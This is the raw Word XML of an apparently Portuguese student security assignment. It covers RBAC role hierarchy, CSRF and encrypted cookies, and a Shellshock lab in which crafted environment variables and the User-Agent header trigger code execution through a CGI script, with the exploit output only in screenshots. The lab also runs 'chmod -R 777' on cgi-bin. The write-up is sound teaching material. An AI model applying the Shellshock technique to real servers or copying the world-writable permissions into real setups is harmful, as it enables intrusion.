        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03812FC0" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="161" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0E1191A0" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530C556E" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36408B" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56D756" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8FB29F" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC42FF7" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0F36A0" w14:textId="0A1B055B" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AF8658" w14:textId="6A89E1AE" w:rsidR="00DB6F0E" w:rsidRDefault="00DB6F0E" w:rsidP="00DB6F0E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C1BF4D" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD" w:rsidP="00DB6F0E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc533420484"/>
      <w:r>
        <w:t>Exercício 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D4C4F1" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="179" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65940E77" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRPr="00442818" w:rsidRDefault="00A250B4" w:rsidP="00B95F7B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc533420485"/>
      <w:r w:rsidRPr="00442818">
        <w:t>1.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="53FCAD28" w14:textId="1C64ED53" w:rsidR="0032723C" w:rsidRDefault="0021416A" w:rsidP="0021416A">
      <w:r w:rsidRPr="0021416A">
        <w:t>A resposta é afirmativa, porque caso exista um role R2 que seja sénior de R e exista (U,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0021416A">
        <w:t xml:space="preserve">R2) na relação </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0021416A">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0021416A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0021416A">
        <w:t>assignment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0021416A">
        <w:t>, UA, significa que se R2 estiver ativo numa dada sessão, R também estará, sem que esteja explicitamente (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0021416A">
        <w:t>U,R</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0021416A">
        <w:t>) em UA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F151D5" w14:textId="72B148BA" w:rsidR="0021416A" w:rsidRDefault="0021416A" w:rsidP="0021416A"/>
    <w:p w14:paraId="163FEF6C" w14:textId="7FB73E31" w:rsidR="0021416A" w:rsidRDefault="0021416A" w:rsidP="0021416A">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc533420486"/>
      <w:r>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="18CE4DD0" w14:textId="3A54501D" w:rsidR="009D061E" w:rsidRDefault="009D061E" w:rsidP="0021416A">
      <w:r>
        <w:t>De acordo com o princípio do privilégio mínimo, caso um utilizador</w:t>
      </w:r>
      <w:r w:rsidR="00BF3CF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tenha roles sénior ativos de outro roles</w:t>
      </w:r>
      <w:r w:rsidR="00BF3CF7">
        <w:t xml:space="preserve"> e esses estivarem ativos,</w:t>
      </w:r>
      <w:r w:rsidR="00BF3CF7" w:rsidRPr="009D061E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3CF7">
        <w:t xml:space="preserve">numa determinada sessão, </w:t>
      </w:r>
      <w:r>
        <w:t>se for realizar uma operação que os roles júnior consigam executar, iram estes últimos ser usados em vez dos seniores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F12ED4" w14:textId="7C1BE4E2" w:rsidR="009D061E" w:rsidRDefault="009D061E" w:rsidP="0021416A"/>
    <w:p w14:paraId="5528A9C3" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="480580AB" w14:textId="1363CD31" w:rsidR="009D061E" w:rsidRDefault="009D061E" w:rsidP="009D061E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc533420487"/>
      <w:r>
        <w:t>Exercício 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="76C390C9" w14:textId="479673DE" w:rsidR="009D061E" w:rsidRDefault="009D061E" w:rsidP="009D061E"/>
    <w:p w14:paraId="28CBF31E" w14:textId="56B7F272" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:t xml:space="preserve">Ao fazer uso de cookies cifrados não estamos a dificultar tipos de ataque CSRF, visto que o ataque se baseia em, estando no mesmo browser, efetuar pedidos de origens diferentes para o mesmo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> usando o mesmo cookie, o que torna impossível à aplicação web distinguir quem foi o responsável pelo pedido. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A852D" w14:textId="3AA90F43" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:t>Ao cifrar os cookies, o problema mantém-se, pois, o atacante usa de igual forma o cookie cifrado, sendo este posteriormente decifrado pela aplicação web, que por sua vez não consegue distinguir quem realizou o pedido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7E76F" w14:textId="68908B6E" w:rsidR="009D061E" w:rsidRPr="009D061E" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:t xml:space="preserve">Para resolver este problema, podemos usar um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que é gerado no momento da autenticação e guardado na sessão. Desta forma, o atacante, desconhecendo o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gerado, não se conseguirá fazer passar pela vítima, visto que no momento em que efetuar o seu pedido será lhe fornecido um outro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de autenticação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF13C0" w14:textId="14057AD4" w:rsidR="009D061E" w:rsidRDefault="009D061E" w:rsidP="0021416A"/>
    <w:p w14:paraId="3145DA74" w14:textId="5F155B40" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="515A8329" w14:textId="46A3C998" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="1479AFF4" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="33E40F73" w14:textId="4F318C5D" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="3AE2A09B" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="0021416A"/>
    <w:p w14:paraId="4BBCEF55" w14:textId="5972BB29" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc533420488"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercício 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2182FAEC" w14:textId="10E4B242" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0"/>
    <w:p w14:paraId="6838EA85" w14:textId="45709B38" w:rsidR="00B36A87" w:rsidRPr="00B36A87" w:rsidRDefault="006370B0" w:rsidP="00B36A87">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc533420489"/>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="670E497E" w14:textId="2BE8889A" w:rsidR="006370B0" w:rsidRPr="00B36A87" w:rsidRDefault="006370B0" w:rsidP="00B36A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006370B0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2653DF" w14:textId="7ACDF716" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:t>Através da leitura do anexo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” foi possível detetar a vulnerabilidade do programa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Ao definirmos a variável de ambiente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> iniciada por uma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> iniciada com </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“( )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>” e uma definição da função dentro de “{ }”, o código posterior ao fim da função irá ser executado após a exportação da variável de ambiente e da criação de um processo filho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07881146" w14:textId="77777777" w:rsidR="00E610F9" w:rsidRDefault="00A974D5" w:rsidP="006370B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No exemplo </w:t>
      </w:r>
      <w:r w:rsidR="00E610F9">
        <w:t>abaixo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que demonstra esta vulnerabilidade</w:t>
      </w:r>
      <w:r w:rsidR="006370B0">
        <w:t xml:space="preserve">, o código a executar é o print na consola da expressão: “I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006370B0">
        <w:t>am</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006370B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006370B0">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006370B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006370B0">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006370B0">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00E610F9" w:rsidRPr="00E610F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6C5779" w14:textId="70A510F2" w:rsidR="006370B0" w:rsidRDefault="00E610F9" w:rsidP="006370B0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1C9294" wp14:editId="7F30199E">
            <wp:extent cx="5033961" cy="2001982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8075" cy="2015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47F0C" w14:textId="5D9BDE8A" w:rsidR="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:t>Na versão atualizada, este problema já não acontece, como se pode verificar em:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1CE3E" w14:textId="10E8279F" w:rsidR="006370B0" w:rsidRPr="006370B0" w:rsidRDefault="006370B0" w:rsidP="006370B0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3544A739" wp14:editId="1CB714AA">
            <wp:extent cx="5191125" cy="919313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882" cy="92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61358" w14:textId="0A0B5990" w:rsidR="0021416A" w:rsidRDefault="0021416A" w:rsidP="0021416A"/>
    <w:p w14:paraId="3939925F" w14:textId="45A38641" w:rsidR="00E610F9" w:rsidRPr="006370B0" w:rsidRDefault="00E610F9" w:rsidP="00E610F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6454F081" w14:textId="0794F92D" w:rsidR="00DD20DA" w:rsidRDefault="00E95C26" w:rsidP="00E95C26">
      <w:r>
        <w:t xml:space="preserve">De modo a ter permissões sobre a diretoria </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-bin, e ao executável posteriormente criado, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setup.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, que contem o programa CGI proposto, foi necessário respetivamente executar os seguintes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4ADC5" w14:textId="63FC6253" w:rsidR="00DD20DA" w:rsidRDefault="00DD20DA" w:rsidP="00B36A87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>777 .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57870DD0" w14:textId="02B4C784" w:rsidR="00E95C26" w:rsidRDefault="00DD20DA" w:rsidP="00B36A87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:r w:rsidR="00E95C26">
        <w:t>755 ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E95C26">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E95C26">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E95C26">
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E95C26">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E95C26">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E95C26">
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E95C26">
        <w:t>setup.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7077A674" w14:textId="2CF0FFE8" w:rsidR="00E95C26" w:rsidRDefault="00DD20DA" w:rsidP="0021416A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="648A1A5A" wp14:editId="2844F6F6">
            <wp:extent cx="5086350" cy="793161"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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885" cy="796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640BF" w14:textId="7D6ED429" w:rsidR="00E95C26" w:rsidRDefault="00E95C26" w:rsidP="00E95C26"/>
    <w:p w14:paraId="2110F70F" w14:textId="100C2F82" w:rsidR="00E95C26" w:rsidRDefault="00E95C26" w:rsidP="00B36A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A700F" w14:textId="3E873710" w:rsidR="00E95C26" w:rsidRDefault="00E95C26" w:rsidP="00E95C26">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Após a execução do pedido uma primeira vez, detetou-se que existia uma variável de ambiente, QUERY_STRING, onde seria possível passar os nossos dados. Porém, também seria possível passar dado</w:t>
      </w:r>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s como um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do pedido, por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exemlo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pelo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C569B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64583A6D" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRPr="00E95C26" w:rsidRDefault="00B36A87" w:rsidP="00E95C26">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A52F48" w14:textId="22E2AD2E" w:rsidR="00E95C26" w:rsidRDefault="00E95C26" w:rsidP="00E95C26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F197A1C" wp14:editId="746B84C3">
            <wp:extent cx="5086350" cy="293434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7015" cy="29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5A615" w14:textId="77FD9B3C" w:rsidR="00E95C26" w:rsidRPr="006370B0" w:rsidRDefault="00E95C26" w:rsidP="00E95C26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7394E92" wp14:editId="1C7FB7B7">
            <wp:extent cx="5081754" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="508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0261" cy="301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4F3E4" w14:textId="27C64ABB" w:rsidR="002C569B" w:rsidRDefault="002C569B" w:rsidP="002C569B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2DA752" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="002C569B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601BF47C" w14:textId="60346A36" w:rsidR="002C569B" w:rsidRPr="002C569B" w:rsidRDefault="002C569B" w:rsidP="002C569B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc533420490"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6AB6781D" w14:textId="39D0FA35" w:rsidR="002C569B" w:rsidRDefault="002C569B" w:rsidP="002C569B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B8AE3" w14:textId="4C6F3467" w:rsidR="002C569B" w:rsidRPr="002C569B" w:rsidRDefault="00464EF3" w:rsidP="002C569B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE2C79" w14:textId="1770DF06" w:rsidR="00E610F9" w:rsidRDefault="002C569B" w:rsidP="00E95C26">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683BA4DC" wp14:editId="38955685">
            <wp:extent cx="5614670" cy="374395"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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3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8B6BB" w14:textId="1BBFBBEE" w:rsidR="002C569B" w:rsidRDefault="002C569B" w:rsidP="00E95C26">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626F86BB" wp14:editId="6B909171">
            <wp:extent cx="3516923" cy="1035143"/>
            <wp:effectExtent l="0" t="0" r="762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46460" cy="1043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95F85" w14:textId="5666AC29" w:rsidR="002C569B" w:rsidRDefault="002C569B" w:rsidP="00E95C26">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF93FFE" wp14:editId="1B021449">
